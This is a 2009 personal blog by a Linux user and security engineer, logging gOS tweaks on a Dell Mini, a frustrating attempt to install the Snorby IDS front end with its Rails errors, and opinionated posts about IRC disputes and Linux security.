ID Name Last auto-update Uptime
316269 starchild 2008-05-12 00:06:02 414.8

Nice, huh?? Don't let the load average fool you...it has a decent load at certain intervals, and that doesn't include when I'm doing maintenance.

Non-Slackware post

2009-08-06T02:38:00.011-04:00

Working on my Dell Mini with gOS installed, I've edited the dock bar to include Mozilla's Thunderbird. Basically I edited .wbar in my ~/home dir...I've added the following:

i: /usr/share/icons/gOS3_Icons/scalable/apps/mozilla-thunderbird.png
c: glaunch thunderbird.desktop
t: Thunderbird

I added this under the Firefox entry.

The dock looked like this before the change:

The dock now looks like this:

I actually had to experiment with this. Apparently, the gOS forums lack this documentation, as I haven't seen any documentation on how to change the dock's format, so I'm posting it here.

EDIT: Wbarconf under "gOS/accessories" is apparently the tool to use to edit the dock bar. Found that tidbit of info here. Note the date of Oct 2008. Although I found the answer on my own, I searched the internet after I applied my edit, checking to see how prevalent the info is...its not that prevalent. That's about the only hit I got, other than one other explaining to download some GUI tool that would allow editing of the dock.

EDIT: Another link describing how to edit the dock bar. Look for "How to add edit and delete the content of the "dock" (Wbar)"

Also, after reading Linux Format LXF119, I've decided to try some hard disk information tools: Filelight, a tool that shows graphical representation of hard disk usage and HardInfo, which is a system profiler/benchmarker. Screenshots are below. Both are decent tools and I recommend them.

Filelight:

HardInfo:

Killing my usage of Snorby

2009-07-27T23:51:00.008-04:00

I've stopped attempting to get Snorby running. Why? After digging into this for over two weeks, logging my attempts on this blog, I again asked for someone to guide me in the right direction at Snorby's Google group:

Any news on this issue?

I'm at a dead standstill in implementing...can't even get a login
prompt.

I realize your main focus is to get to v1.0 status, but its hard for
me to contribute to the project if I can't get it running even when
following the instructions specifically.

Thanks,
unixfool

The response?

Hello,

Version 1.0.1 is the current release. I very doubt you followed the
instructions properly as there are 20-30 people in the irc channel
that have had no issues. I am not even sure what your issue is. Did you rake snorby:setup RAILS_ENV=production

I have no problem helping when there are real errors but its quite
annoying when its just because someone did not read the docs.

Please post your logs and let me figure out a workaround.

- Dustin

My parting response:

I followed EXACTLY what was on your pages. If there's an issue with the way it was set up, it could be the fact that your instructions on your website need to be updated.

Look, I stated in my blog that I was going to test Snorby. You posted to my blog that you would like to know if there were any issues. I stated I had an issue and even gave you a LOT of debugging information, which is a far cry from what I've been seeing here in your Google group and now you're getting a bit snobbish?

I don't particularly like your tone, so from here on out, no Snorby for me. Cool project, but I shouldn't have to be a freaking Rails expert to use any security tool...really. The fact that I can set up Snort (and its deps) blindfolded and install most other frontends (and their deps) without issue or handholding tells me that I'm competent enough. I really don't need the attitude...and you did this on a freakin' group listing. An e-mail would've been more tactful, but in the end, your attitude would've rubbed me raw all the same.

And, you know what? You keep harping on visiting freenode. I've no problem with freenode, especially since I oper and have ownership of ##slackware, but if you would much rather leverage IRC for support, what do you have this group for? Really? If you respond to everyone here in such a manner when they ask questions about your tool, you're not going to get nearly the user base that you want. No one wants to be spoken down to in such a manner.

Anyways, I'm out. I've said my piece and will remove myself from this group. Please do NOT respond or send me e-mail. You've made yourself clear that you don't like helping people use your tool. I'm done.

The whole thread is here

Actually, I'm pretty pissed off. I don't like using someone's tool and trying to contribute but having issues even implementing the freakin' piece of software, especially when I get major attitude when asking questions. WTF is the use in supplying debugging traces when the developer doesn't even look at it and assess if there's something wrong with his code implementation or if the user is using it wrong. I have some project management skills and I can tell you now that if I developed a process at my work environment and my team had issues with my process, I'd want to know the who/what/when/where/why so that I can assess my process and see if I made an error or if it needs to be clarified. I NEVER tell my team something akin to, "you didn't read the process," especially if there is a high probability that they actually did. No one is infallible, not even this particular guy. I'd have been humbled if I'd found that there indeed were instructions that I'd missed...that's not the case, though, unless he's maintaining documentation in another place. I wouldn't know and I shouldn't have to visit a damned IRC channel to ferret out discrepancies or hunt for additional support in a new tool...WTF is the Google group for if I can't ask questions there? Can you imagine if everyone on the AOLS mailing group said, "visit the IRC channel for your answer"?

Belittling people alienates people. Not even US Army drill sergeants do this (don't believe everything you see on TV).

No Snorby coverage will happen here again. No Snorby usage will occur. We're closing this chapter right now!

EDIT: After this post and after a few days of cooling off a bit, I decided to determine if the issue was actually with me, the way I set up Ruby/Rails, or any configuration of Snorby. I was still 100% sure I followed the directions properly, so I didn't change any configs of Snorby or my Ruby/Rails setup. I only refrshed the Snorby environment by pulling the latest update. Guess what? Snorby worked. This leads me to believe that something in the Snorby code changed...something the developer changed after he pissed me off with his insistence that I hadn't read the instructions and that I was just another person using his tool who didn't know basic sysadmin skills. Kinda funny that the tool works now when I didn't change anything or reapply the instructions...I just refreshed the code. Something smells bad and it isn't me...

Ruby, Rails, Gems Redux Part III

2009-07-23T22:29:00.004-04:00

I'm starting to get a bit annoyed. I still can't get this working properly. Getting the same error as I got in my last post. I haven't changed anything but I've double- and triple-checked.

Right now, I'm currently posting to the Snorby Goggle group to try to get some assistance, which I usually don't have to do...I hate being dependent upon others, but that's just me.

Anyways, so far, I've been able to rule out MySQL as the culprit, as I'm seeing connections from Ruby to the MySQL server. I'm also able to connect to the server as 'root' and as 'snort'. The web server continues to issue status 500 and the Ruby logs indicate that there's something wrong with the user_session/new.html.erb file (keeps saying 'no credentials provided').

One suggestion I got is to do a 'git pull' to update Snorby from the Snorby directory. That command pulled quite a few changes, but after the pull, I'm still receiving the same error:

root@slackbox:~/RAILS/RAILS/Snorby# git pull
remote: Counting objects: 604, done.
remote: Compressing objects: 100% (522/522), done.
Indexing 542 objects...
remote: Total 542 (delta 393), reused 43 (delta 12)
100% (542/542) done
Resolving 393 deltas...
100% (393/393) done
37 objects were added to complete this thin pack.
* refs/remotes/origin/cache_test: storing branch 'cache_test' of git://github.com/mephux/Snorby
commit: a30cf8e
* refs/remotes/origin/master: fast forward to branch 'master' of git://github.com/mephux/Snorby
old..new: e17ace1..7edf9e9
Updating e17ace1..7edf9e9

Fast forward
app/controllers/application_controller.rb | 2 +-
app/controllers/comments_controller.rb | 57 ++++++++++
app/controllers/events_controller.rb | 4 +-
app/controllers/pages_controller.rb | 25 ++++-
app/controllers/searches_controller.rb | 4 +-
app/controllers/user_sessions_controller.rb | 2 +-
app/helpers/application_helper.rb | 41 +++-----
app/helpers/comments_helper.rb | 2 +
app/models/comment.rb | 5 +
app/models/event.rb | 17 +++
app/models/importance.rb | 3 +-
app/models/report.rb | 2 +-
app/models/search.rb | 4 +-
app/models/user.rb | 17 +++-
app/views/comments/_comment.html.erb | 15 +++
app/views/comments/_form.html.erb | 9 ++
app/views/comments/create.js.rjs | 11 ++
app/views/comments/destroy.js.rjs | 2 +
app/views/comments/edit.html.erb | 3 +
app/views/comments/new.html.erb | 5 +
app/views/events/_comments_for_event.html.erb | 21 ++++
app/views/events/_event.html.erb | 21 +++-
app/views/events/_ip_data.html.erb | 15 ++-
app/views/events/_summary.html.erb | 8 +-
app/views/events/remove_event.js.rjs | 2 +-
app/views/events/send_event.html.erb | 4 +-
app/views/events/show.html.erb | 4 +
app/views/pages/category.html.erb | 13 +++
app/views/pages/category.js.rjs | 1 +
app/views/pages/dashboard.html.erb | 20 ++--
app/views/pages/severity.html.erb | 8 ++
app/views/pages/severity.js.rjs | 1 +
app/views/reports/send_report.html.erb | 2 +-
app/views/searches/send_search.html.erb | 2 +-
app/views/searches/show.html.erb | 4 +-
app/views/settings/index.html.erb | 2 +-
config/email.yml.example | 3 +-
config/routes.rb | 8 +-
db/migrate/20090719222259_create_comments.rb | 16 +++
db/schema.rb | 12 ++-
public/flash/clippy.swf | Bin 5380 -> 0 bytes
public/images/.DS_Store | Bin 12292 -> 12292 bytes
public/images/comment/comment_top.png | Bin 0 -> 4759 bytes
public/images/cross.png | Bin 655 -> 689 bytes
public/images/other/{destroy.png => destroy2.png} | Bin 715 -> 715 bytes
public/images/other/edit.png | Bin 0 -> 497 bytes
public/images/other/is_not_important.png | Bin 648 -> 633 bytes
public/images/other/no_comment.png | Bin 0 -> 604 bytes
public/images/other/slash.png | Bin 714 -> 689 bytes
public/images/other/slash2.png | Bin 0 -> 714 bytes
public/images/other/whois.png | Bin 0 -> 595 bytes
public/stylesheets/snorby.css | 118 ++++++++++++++++++++-
test/fixtures/comments.yml | 11 ++
test/functional/comments_controller_test.rb | 54 ++++++++++
test/unit/comment_test.rb | 7 ++
55 files changed, 504 insertions(+), 83 deletions(-)
create mode 100644 app/controllers/comments_controller.rb
create mode 100644 app/helpers/comments_helper.rb
create mode 100644 app/models/comment.rb
create mode 100644 app/views/comments/_comment.html.erb
create mode 100644 app/views/comments/_form.html.erb
create mode 100644 app/views/comments/create.js.rjs
create mode 100644 app/views/comments/destroy.js.rjs
create mode 100644 app/views/comments/edit.html.erb
create mode 100644 app/views/comments/new.html.erb
create mode 100644 app/views/events/_comments_for_event.html.erb
create mode 100644 app/views/pages/category.html.erb
create mode 100644 app/views/pages/category.js.rjs
create mode 100644 app/views/pages/severity.html.erb
create mode 100644 app/views/pages/severity.js.rjs
create mode 100644 db/migrate/20090719222259_create_comments.rb
delete mode 100644 public/flash/clippy.swf
create mode 100644 public/images/comment/comment_top.png
rename public/images/other/{destroy.png => destroy2.png} (100%)
create mode 100755 public/images/other/edit.png
create mode 100644 public/images/other/no_comment.png
create mode 100644 public/images/other/slash2.png
create mode 100644 public/images/other/whois.png
create mode 100644 test/fixtures/comments.yml
create mode 100644 test/functional/comments_controller_test.rb
create mode 100644 test/unit/comment_test.rb

root@slackbox:~/RAILS/RAILS/Snorby# script/server -e production -b 10.150.1.106 -p 3000
=> Booting WEBrick
=> Rails 2.3.2 application starting on http://10.150.1.106:3000
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2009-07-23 22:18:39] INFO WEBrick 1.3.1
[2009-07-23 22:18:39] INFO ruby 1.8.6 (2007-03-13) [i486-linux]
[2009-07-23 22:18:39] WARN TCPServer Error: Address already in use - bind(2)
[2009-07-23 22:18:39] INFO WEBrick::HTTPServer#start: pid=5752 port=3000

Processing UserSessionsController#new (for ::ffff:10.150.1.106 at 2009-07-23 22:18:40) [GET]
Parameters: {"action"=>"new", "controller"=>"user_sessions"}
Rendering template within layouts/application
Rendering user_sessions/new

ActionView::TemplateError (undefined method `login' for #) on line #8 of app/views/user_sessions/new.html.erb:
5: <% form_for @user_session, :url => user_session_path do |f| %>
6: <%= f.error_messages %>
7: <%= f.label :login %>

8: <%= f.text_field :login %>

9:

10: <%= f.label :password %>

11: <%= f.password_field :password %>

app/views/user_sessions/new.html.erb:8
app/views/user_sessions/new.html.erb:5
/usr/lib/ruby/1.8/webrick/httpserver.rb:104:in `service'
/usr/lib/ruby/1.8/webrick/httpserver.rb:65:in `run'
/usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:95:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `each'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:23:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:82:in `start'

Rendering /root/RAILS/RAILS/Snorby/public/500.html (500 Internal Server Error)

Processing ApplicationController#index (for ::ffff:10.150.1.106 at 2009-07-23 22:20:40) [GET]

ActionController::RoutingError (No route matches "/test/" with {:method=>:get}):
/usr/lib/ruby/1.8/webrick/httpserver.rb:104:in `service'
/usr/lib/ruby/1.8/webrick/httpserver.rb:65:in `run'
/usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:95:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `each'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:23:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:82:in `start'

Rendering /root/RAILS/RAILS/Snorby/public/404.html (404 Not Found)

Processing UserSessionsController#new (for ::ffff:10.150.1.106 at 2009-07-23 22:20:55) [GET]
Parameters: {"action"=>"new", "controller"=>"user_sessions"}
Rendering template within layouts/application
Rendering user_sessions/new

ActionView::TemplateError (undefined method `login' for #) on line #8 of app/views/user_sessions/new.html.erb:
5: <% form_for @user_session, :url => user_session_path do |f| %>
6: <%= f.error_messages %>
7: <%= f.label :login %>

8: <%= f.text_field :login %>

9:

10: <%= f.label :password %>

11: <%= f.password_field :password %>

app/views/user_sessions/new.html.erb:8
app/views/user_sessions/new.html.erb:5
/usr/lib/ruby/1.8/webrick/httpserver.rb:104:in `service'
/usr/lib/ruby/1.8/webrick/httpserver.rb:65:in `run'
/usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:95:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `each'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:23:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:82:in `start'

Rendering /root/RAILS/RAILS/Snorby/public/500.html (500 Internal Server Error)

Grrr. Something isn't quite right here. I've followed the documents properly in installing Snorby, but something was obviously missed. I'm totally reliant upon the developers at this point. While this is normal for some people, it isn't for me. At work, our dev team are the VERY last people I go to, because they tend to either try to make you look stupid or will say some shit like 'it is what it is'. I'm trying to keep in mind that my bad experience with developers is limited to work and not the open-source community. That being said, I've invested quite a bit of time and effort on the Snorby project. While I've learned a few things, I do have an end goal and I'm a goal-oriented person.

I'll stop updating on Snorby until I actually have it working.

Ruby, Rails, Gems Redux Part II

2009-07-17T16:51:00.007-04:00

Did a little research on the gem for MySQL and decided to try this:

root@slackbox:~/RAILS/RAILS/Snorby# locate mysql_config
/usr/man/man1/mysql_config.1.gz
/usr/bin/mysql_config
root@slackbox:~/RAILS/RAILS/Snorby# gem install mysql -- --with-mysql-config=/usr/bin/mysql_config
Building native extensions. This could take a while...
Successfully installed mysql-2.7
1 gem installed
Installing ri documentation for mysql-2.7...
Installing RDoc documentation for mysql-2.7...
root@slackbox:~/RAILS/RAILS/Snorby#

Now about my Snort architecture, I'm thinking all I'm gonna have to do is copy my Snrot database over to Slackbox and then have my two Snort machines (one internal and one sensor at a datacenter) report to Slackbox....OR, have the Snort sensors report to BOTH the FreeBSD server AND Slackbox! I think the latter will work and it sounds like the better solution.

I'll be updating this post with my successes and failures most of the night, I suspect, or at least until I get good and pissed off. LOL!

=====

Update:

There's nothing like backing up an 83MB database file on old hardware:

Starting: 6:31PM up 23 days, 19:27, 4 users, load averages: 2.89, 2.94, 3.13

Ending: 6:33PM up 23 days, 19:29, 4 users, load averages: 5.88, 3.98, 3.51

While I'm sure that's incomparable to an enterprise database, at one point, I thought the old dell system would lock up.

I also was trying to do this via phpMyAdmin on both machines, but I didn't know the dbase size was that large (4 yrs of sniffing data). phpMyAdmin on the BSD box would say it was finished exporting but I'd check the filesize and it was different each time (did it like 4 times before I decided to go commandline. phpMyAdmin kept giving me a filesize of between 20M and 40M. It must've been choking out. I optimized the dbase, also, so it was more than likely larger than 83MB.

=====

Update:

Had to upgrade MySQL, as my 83MB file wouldn't import into Slackbox's MySQL server. 30 seconds into the import, the import would lock up or die. Apparently, it's a known issue with MySQL's lower versions.

Anyways, after the import and creation of new MySQL users, I had to edit Snorby's config/database.yml file, specifically the development part. The reason:

root@slackbox:~/RAILS/RAILS/Snorby# script/server -p 11001
=> Booting WEBrick
=> Rails 2.3.2 application starting on http://0.0.0.0:11001
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2009-07-17 21:48:14] INFO WEBrick 1.3.1
[2009-07-17 21:48:14] INFO ruby 1.8.6 (2007-03-13) [i486-linux]
[2009-07-17 21:48:14] WARN TCPServer Error: Address already in use - bind(2)
[2009-07-17 21:48:14] INFO WEBrick::HTTPServer#start: pid=3848 port=11001
/!\ FAILSAFE /!\ Fri Jul 17 21:48:17 -0400 2009
Status: 500 Internal Server Error
Can't connect to MySQL server on 'no_not_use' (111)

It's still not clear to me why I had to edit it, but I did because the production portion was populated with the proper credentials but I was still receiving the above error..."Can't connect to MySQL server on 'no_not_use'". When I did it, I stopped getting that error.

*** I found why I was getting the MySQL error. The config/database.yml development entry has 'mysql' for the database entry. It should be 'no_not_use'. I've edited this to what is was originally supposed to be and changed everything back to 'no_not_use'. I no longer get the error when using the production settings. ***

Also, notice that I ran in what I want to call 'debug mode' because I wanted to see what was hanging up the connection.

So, now, after some editing and fiddling, I get the following in 'debug mode':

root@slackbox:~/RAILS/RAILS/Snorby# script/server -e production -b 10.150.1.106 -p 11001
=> Booting WEBrick
=> Rails 2.3.2 application starting on http://10.150.1.106:11001
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2009-07-17 21:55:37] INFO WEBrick 1.3.1
[2009-07-17 21:55:38] INFO ruby 1.8.6 (2007-03-13) [i486-linux]
[2009-07-17 21:55:38] WARN TCPServer Error: Address already in use - bind(2)
[2009-07-17 21:55:38] INFO WEBrick::HTTPServer#start: pid=3915 port=11001

Processing UserSessionsController#new (for ::ffff:10.150.1.106 at 2009-07-17 21:55:40) [GET]
Parameters: {"action"=>"new", "controller"=>"user_sessions"}
Rendering template within layouts/application
Rendering user_sessions/new

ActionView::TemplateError (undefined method `login' for #) on line #8 of app/views/user_sessions/new.html.erb:
5: <% form_for @user_session, :url => user_session_path do |f| %>
6: <%= f.error_messages %>
7: <%= f.label :login %>

8: <%= f.text_field :login %>

9:

10: <%= f.label :password %>

11: <%= f.password_field :password %>

app/views/user_sessions/new.html.erb:8
app/views/user_sessions/new.html.erb:5
/usr/lib/ruby/1.8/webrick/httpserver.rb:104:in `service'
/usr/lib/ruby/1.8/webrick/httpserver.rb:65:in `run'
/usr/lib/ruby/1.8/webrick/server.rb:173:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:162:in `start_thread'
/usr/lib/ruby/1.8/webrick/server.rb:95:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `each'
/usr/lib/ruby/1.8/webrick/server.rb:92:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:23:in `start'
/usr/lib/ruby/1.8/webrick/server.rb:82:in `start'

Rendering /root/RAILS/RAILS/Snorby/public/500.html (500 Internal Server Error)

The thing is, I see nothing in the web browser, but:

We're sorry, but something went wrong.

We've been notified about this issue and we'll take a look at it shortly.

Something else that is nagging me that I was trying to fiddle with is:

[2009-07-17 21:55:38] WARN TCPServer Error: Address already in use - bind(2)

There is only one Ruby service running and nothing is utilizing that port when I run Ruby. I'm ignoring it for now.

I would love to see what the WEBrick logs show, if there are any.

For now, its time to do some serious Googling and maybe hit up my three Ruby/Rails books.

Ruby, Rails, Gems Redux

2009-07-17T00:04:00.005-04:00

I decided to use Slackware this time. I've had better luck.

My install already has Ruby 1.8.6 (the latest stable is 1.8.7, I believe).

Ran into an issue when following these instructions. Was supposed to do 'rake gems:install' but got a 'prawn' error

root@slackbox:~/RAILS/RAILS/Snorby# rake gems:install
(in /root/RAILS/RAILS/Snorby)
rake aborted!
no such file to load -- prawn

Fixed it by using 'gem install prawn'. After running that command, I was able to run the 'rake gems:install' without error.

Now I'm having a similar issue when running 'rake snorby:setup':

root@slackbox:~/RAILS/RAILS/Snorby# rake snorby:setup
(in /root/RAILS/RAILS/Snorby)
Setting Up Snorby Database.
!!! The bundled mysql.rb driver has been removed from Rails 2.2. Please install the mysql gem and try again: gem install mysql.
rake aborted!
no such file to load -- mysql

Running 'gem install mysql' give me a BUNCH of errors:

root@slackbox:~/RAILS/RAILS/Snorby# gem install mysql
Building native extensions. This could take a while...
ERROR: Error installing mysql:
ERROR: Failed to build gem native extension.

/usr/bin/ruby extconf.rb
checking for mysql_query() in -lmysqlclient... no
checking for main() in -lm... no
checking for mysql_query() in -lmysqlclient... no
checking for main() in -lz... no
checking for mysql_query() in -lmysqlclient... no
checking for main() in -lsocket... no
checking for mysql_query() in -lmysqlclient... no
checking for main() in -lnsl... no
checking for mysql_query() in -lmysqlclient... no
*** extconf.rb failed ***
Could not create Makefile due to some reason, probably lack of
necessary libraries and/or headers. Check the mkmf.log file for more
details. You may need configuration options.

Provided configuration options:
--with-opt-dir
--without-opt-dir
--with-opt-include
--without-opt-include=${opt-dir}/include
--with-opt-lib
--without-opt-lib=${opt-dir}/lib
--with-make-prog
--without-make-prog
--srcdir=.
--curdir
--ruby=/usr/bin/ruby
--with-mysql-config
--without-mysql-config
--with-mysql-dir
--without-mysql-dir
--with-mysql-include
--without-mysql-include=${mysql-dir}/include
--with-mysql-lib
--without-mysql-lib=${mysql-dir}/lib
--with-mysqlclientlib
--without-mysqlclientlib
--with-mlib
--without-mlib
--with-mysqlclientlib
--without-mysqlclientlib
--with-zlib
--without-zlib
--with-mysqlclientlib
--without-mysqlclientlib
--with-socketlib
--without-socketlib
--with-mysqlclientlib
--without-mysqlclientlib
--with-nsllib
--without-nsllib
--with-mysqlclientlib
--without-mysqlclientlib

Gem files will remain installed in /usr/lib/ruby/gems/1.8/gems/mysql-2.7 for inspection.
Results logged to /usr/lib/ruby/gems/1.8/gems/mysql-2.7/gem_make.out

Grrr...!!!

But, I'm a lot closer this time than last time. I'll sort it out either tomorrow night or this weekend.

Oh, and one more thing. Maybe this is more complicated than it has to be, because I've already got BASE running on a server who's internal IP is 10.150.1.103 (FreeBSD on a Dell server/workstation). The MySQL server is also on that box. Maybe I don't actually need the MySQL gem? Can I leverage the actual database on the FreeBSD box and maybe skip some steps? We'll find out, otherwise, I'm going to have to maybe copy the database over to the Slackware machine so I can test. Yeah, I really wanted Snorby on the FreeBSD box but for some reason I'm more comfortable with Slackware.

Rails, Ruby, Gems...PITA

2009-07-13T22:48:00.005-04:00

I spent the evening trying to get Snorby installed.

I've sporadically messed with Ruby on Rails before, actually getting it installed and playing a bit with it before moving on to other things.

Now, I've been hindered by an out-of-date Rails install. I tried to install Snorby and every step I have to take two steps backward. I ended up reinstalling to the latest version that FreeBSD (yeah, doing this on a BSD install, as it seems easier to install this way), but that version wasn't high enough.

Now, I'm installing the latest by source. I'm as far as I've ever been tonight, which is good because I'm running out of time. I'm installing the Gems at the moment and the install is agonizingly slow (doing this on a dual proc 450MHz machine). It appears most of this are documentation installs. :/

Maybe I can get this done and still be able to get a bit of sleep before I've to get up for work.

So far, see below .txt file...looks good so far:

http://wigglit.ath.cx/ruby.txt

AAARGH!!

[root@delly /usr/local/www/data/Snorby]# rake snorby:setup
(in /usr/local/www/data/Snorby)
Missing these required gems:
javan-whenever

You're running:
ruby 1.8.5 at /usr/local/bin/ruby18
rubygems 1.3.1 at /root/.gem/ruby/1.8, /usr/local/lib/ruby/gems/1.8

Run `rake gems:install` to install the missing gems.

Almost there but I'm out of time...will continue tomorrow.

Main Slackbox (named slackbox) back online

2009-07-13T17:03:00.004-04:00

I finally had time to figure out what was going on with my Slackware tower. It has been down for so long I forget when it actually started having issues. I believe it began having problems since the beginning of 2009.

The culprit? Either the SATA drive that I installed in it awhile back or the SATA controllers on teh board. It's difficult to tell without swapping the SATA drive out for another. I just disabled it (the drive) for now. It works fine without it connected...that tells me its the drive and not the controller.

I began by trying to boot it up by using a Ubuntu LiveCD. It wouldn't boot up and showed many ATA-based errors in the logs. I tried a different Ubuntu LiveCD (v8.10, I believe)...still, same issue.

It was then that I started focusing on the SATA drive. I just unplugged it and tried to reboot...got a reboot and the system has been running for about a week without any issues.

So, I lost a drive. It's not a big deal, as that drive was hosting Windows, I believe. Weird, because that drive is rather young. I believe its a WD (I have seriously bad luck with that brand). I can do without replacing that drive for now, though.

Youch! Freenode bans Mibbit.com connections

2009-06-26T22:05:00.002-04:00

New freenode webchat (and why to use it)

OW.

I remember awhile back, the server opers would frown upon banning Mibbit users. I guess they had a change of heart due to abusers using Mibbit to dodge bans. I remember having to place broad bans on Mibbit on a temp basis, but it was always temporary bans that I placed. I even became a Mibbit user. I hadn't joined the server using Mibbit in about a month so something happened recently for Freenode to lock out all Mibbit connections.

Oh well.

For now, Freenode is hosting its own web-IRC client: http://webchat.freenode.net/

Researching and found an old flamefest spark

2009-06-06T17:50:00.005-04:00

Reference:

http://mythtv.beirdo.ca/ircLog/channel/1/2008-07-14

Summary: At LQ.org, there was a discussion on the security forums on how vulnerable Linux was to attacks/malware. Someone didn't like what was being discussed because of typical Linux zealotry. What happened on LQ's forums spilled over into ##slackware on IRC. Dagmar, the instigator of a LOT of bad things that used to happen in ##slackware got perm banned by me. Later, documented in the link above, he is his typical self, not even attempting to objectively explain what the whole thing was about, pretty much slandering me about how flawed my thoughts are on the whole thing and is worrying that I'll propagate bad information.

Let me explain some things about myself. I'm an IT security engineer. I don't just mess with routers and I'm not some glorified network engineer. I'm a senior consultant. I not only consult, I'm able to find "needle-in-the-haystack"-type info using packet-level analysis. Most of what I do requires that I be a jack-of-all-trades in network engineering, but my specialty is security. I'm proficient in utilizing many industry-leading security tools, both freeware and commercial software. I work at a very large ISP/telecom within a large managed security services team. I am THE lead of a government security operations center. We manage well over 100 customers' security posture via firewalls, NIDS, HIDS, and IPS appliances, using ArcSight, an aggregation and correlation tool that is fast becoming the standard in security event monitoring.

Every day, we see machines being compromised...this is nothing new. The compromises span every mainstream OS. This includes Linux. Whether it is kernel level or application level is not the argument. The argument is that Linux is not as rock-solid as everyone makes it out to be. Sure, it has more safeguards than Windows-based systems, but it is still susceptible to application-level exploits. Whether this is a coder issue or PEBKAC/user/admin issue is besides the point.

People need to stop thinking that just because they are running Linux, they are safe. That is NOT the case. This is not paranoia speaking. It is from seeing such things happen on a daily basis during security event monitoring. Due to applications such as PHP-Nuke, it is becoming more difficult to secure back end applications. It is much harder to stop SQL injection than it is to stop SSH brute-forcing, for instance. This isn't the only issue, though. The issue is the perception that because Linux code is open and free, the code base is free of vulnerabilities. That is NOT the case. Also, many people think that a majority of the cracker focus is on Win32 because MS has a majority of the market share. That also is NOT the case. That is a big assumption. milw0rm and other such sites document many *nix-based vulnerabilities, along with Bugtraq at Securityfocus track all vulnerabilities. Sometimes, people justify Linux because its security model is better focused than Win32 systems. It is, but that does not mean that Linux is rock-solid. It has its own faults, whether it is the user, the admin, or the software developer (or even kernel developer).

Dagmar has a habit of blocking out people's opinions and sometimes beating people down with his own. Dagmar thinks he knows security more than anyone else when he's just a developer. I see attacks every day on all types of machines. Some of the attacks are successful. I doubt that Dagmar sees those. Dagmar need not worry about me "propagating" untruth, because what I say IS the truth. All you have to do to see the truth is to research and not be blind to other opinions.

Dagmar also stalked. After the IRC discussion, he began to frequent the LQ security forums and respond to every thread I posted to. He was hardly ever in those forums before then. I noticed this immediately (and also checked). I didn't mind this, but when it spilled back over into IRC, I tired of it and wanted it ended...it really had no place in ##slackware and I was fed up with his attitude about the whole thing. I don't suffer drama very well.

Now, Dagmar has been banned several times before for the lack of tact in the way he 'helped' people in ##slackware. He was walking a thin line to begin with. Those with operator status in ##slackware acknowledge that he is knowledgeable, but that is not grounds for him to be dismissed as an abusive ##slackware visitor. Sure enough, he did the same thing with a channel operator (me) and I banned him. I also discussed it with the other operators. The consensus was that he stay banned since his history of being banned was substantial.

That was why he got banned...not because his views went against my own, but because he started regressing back to his former self and became abusive. He did the same in the LQ.org forums, but I was able to filter his posts from my normal views. As an operator at Freenode.net, I can't and shouldn't filter any visitor from my views in ##slackware, so my only option was to ban him, and like I said before, he'd his own infamous nature that was going against him.

As a security consultant, I'm certainly not going to keep my thoughts quiet about what I think is a disservice to my favorite operating system. I certainly know more than someone who is not a security consultant about IT security...its what I get paid to do and its what I've been doing for years. It's the same as a person who has built his own car, vs. someone who works as a senior Mercedes mechanic.

As much as I can, I tell people that there is NO secure OS. It is only as secure as the admin makes it, and even if the admin puts 100% resources into hardening the box, it will never be 100% secure. The LQ security forums is itself proof that Linux systems get compromised more than most people think. 2-3 times a week, someone reports they've been compromised. There's even 4 threads on Linux-based vulnerabilities:

Kernel Vulns
Mozilla Firefox Vulns
The Problem with PHP Application Security
Failed SSH Login Attempts

I can post a ton of other links but why do this when there is Google?

No further issues with gOS so far

2009-05-26T20:44:00.003-04:00

It has been a very good experience, so far.

In fact, I've also been leveraging Thunderbird...this is a first time for me (since Netscape Mail back in the 90s). It is very robust!

I've also aliased a few commands that I tend to use alot, mainly ssh commands that I use on remote hosts.

I've also found some decent background images that I've scaled (using Gimp) to 1024x600.

I've also been conducting my typical security audits (BASE and iptables and web server log perusing).

I've not used my Mac in like 3 weeks! I don't know if that's a good or bad thing (probably bad for the battery).

gOS v3.1 installed on Dell Mini 9

2009-05-11T20:16:00.008-04:00

I took the plunge and installed gOS v3.1 Gadgets onto the Dell Mini 9.

The install went flawlessly.

The issues I have discovered so far:

1. Wireless would not work. I followed the instructions located at http://gosforums.org/viewtopic.php?f=21&t=48&p=203&hilit=broadcom#p223. I applied this fix (when I was using a cat5 connection) and it worked, so the wireless non-functionality is no longer an issue.

2. The Mini won't suspend when I close the lid. I can manually suspend, though. I'll hunt for a fix and apply it later.

I also just noticed that a swap partition was created and configured for use (automatically, when installing gOS). I already have a gig of physical RAM and I don't want to burn out my SSD card, so I'll disable it for now and consider a workaround if/when I need it.

Overall, this is a pretty solid distro and it is pretty cool to be able to use Google tools (this will save drive space and conserve the limited resources this machine has). The Gadgets can also be used offline, so I won't need to be connected to use them...now, that's cool.

Some screenshots:

EDIT:

Fixed the sound issue by following Step 4 of "Installing Ubuntu 8.10 on the Dell Inspiron Mini 9".

I turned off the swap partition by editing out the swap entry in /etc/fstab. I'll test to see how this impacts my install of gOS before removing the partition.

Power adapters and other news

